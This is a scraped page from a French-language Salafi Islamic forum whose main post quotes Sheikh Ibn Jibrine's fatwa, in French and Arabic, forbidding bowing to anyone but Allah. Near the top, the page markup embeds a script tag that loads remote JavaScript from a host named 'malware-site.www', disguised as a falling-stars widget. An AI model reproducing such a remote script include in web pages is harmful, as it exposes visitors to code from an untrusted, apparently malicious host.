ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    Sheikh Abdoullah Ibn Jibrine Il est interdit de s’incliner devant un autre qu’Allah.

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Sheikh Abdoullah Ibn Jibrine Il est interdit de s’incliner devant un autre qu’Allah.

    Message par assalafia le Jeu 21 Aoû - 19:15

    Surprised 
     
    Sheikh Abdoullah Ibn Jibrine Il est interdit de s’incliner devant un autre qu’Allah.

    Peut-on s’incliner pour saluer une personne respectée ou âgée ou l’un des parents au lieu de dire : as-Salâmou Aleykoum Wa Rahmatoullah wa Barakâtouhou?

    Toutes les Louanges appartiennent à Allah

    Le salut habituel consiste à dire : As-Salâmou Aleykoum Wa Rahmatoullah Wa Barakâtouhou en vertu de la parole du Très Haut : {Quand donc vous entrez dans des maisons, adressez- vous mutuellement des salutations venant d' Allah, bénies et agréables. C' est ainsi qu' Allah vous expose Ses versets, afin que vous compreniez}
    ( La Lumière :61 ).

    Les hadith ont bien expliqué ce salut.
    S’agissant du fait de s’incliner, il n’est permis que si la personne que l’on entend saluer ne peut pas se lever à cause de son âge ou s’il s’agit de l’un des parents que l’on n’aime pas amener à se lever ou auquel on ne veut pas donner la peine de se mettre debout pour vous serrer la main ou vous donner l’accolade.
    Si vous vous inclinez pour lui baiser la tête ou le visage en signe de respect et pour tenir compte du droit qu’il a sur vous, l’on ne peut pas considérer cela comme un geste à but cultuel.
    Nul doute que le fait de s’incliner est un acte d’adoration pour Allah, le Très Haut au même titre que le Roukou' (génuflexion).
    Si on s’incline devant quelqu’un sans la poignée de main ni le baiser, cela revient à vénérer cette personne-là.
    Ce qui constitue du polythéisme.

    Sheikh Abdoullah Ibn Djibrine.

    الانحناء لغير الله حرام

    هل يجوز الانحناء عند تحية شخص محترم أو كبير أو أحد الوالدين بدلا عن قول "السلام عليكم ورحمة الله وبركاته" ؟.
    الجواب :

    الحمد لله
    التحية المعتادة هي قول : السلام عليكم ورحمة الله وبركاته ، لقوله تعالى : ( فسلموا على أنفسكم تحية من عند الله مباركة طيبة ) ، وجاءت الأحاديث ببيان هذه التحية . وأما الانحناء فلا يجوز إلا إذا كان المسلّم عليه كبيرا لا يستطيع القيام ، أو أحد الوالدين وتكره أنك تقيمه ، وتكلّـفه أن يقوم ليصافحك أو يعانقك ، فإذا انحنيت وقبلت رأسه أو جبينه على وجه الاحترام له ، لحقه عليك لم يكن ذلك انحناءً يُتعبد به . ولا شك ان الانحناء عبادة لله تعالى كما في الركوع فإذا فُعل ذلك من غير مصافحة أو تقبيل كان ذلك تعظيما لذلك الشخص فيكون شركا .

    الشيخ عبد الله بن جبرين

      La date/heure actuelle est Sam 18 Nov - 9:12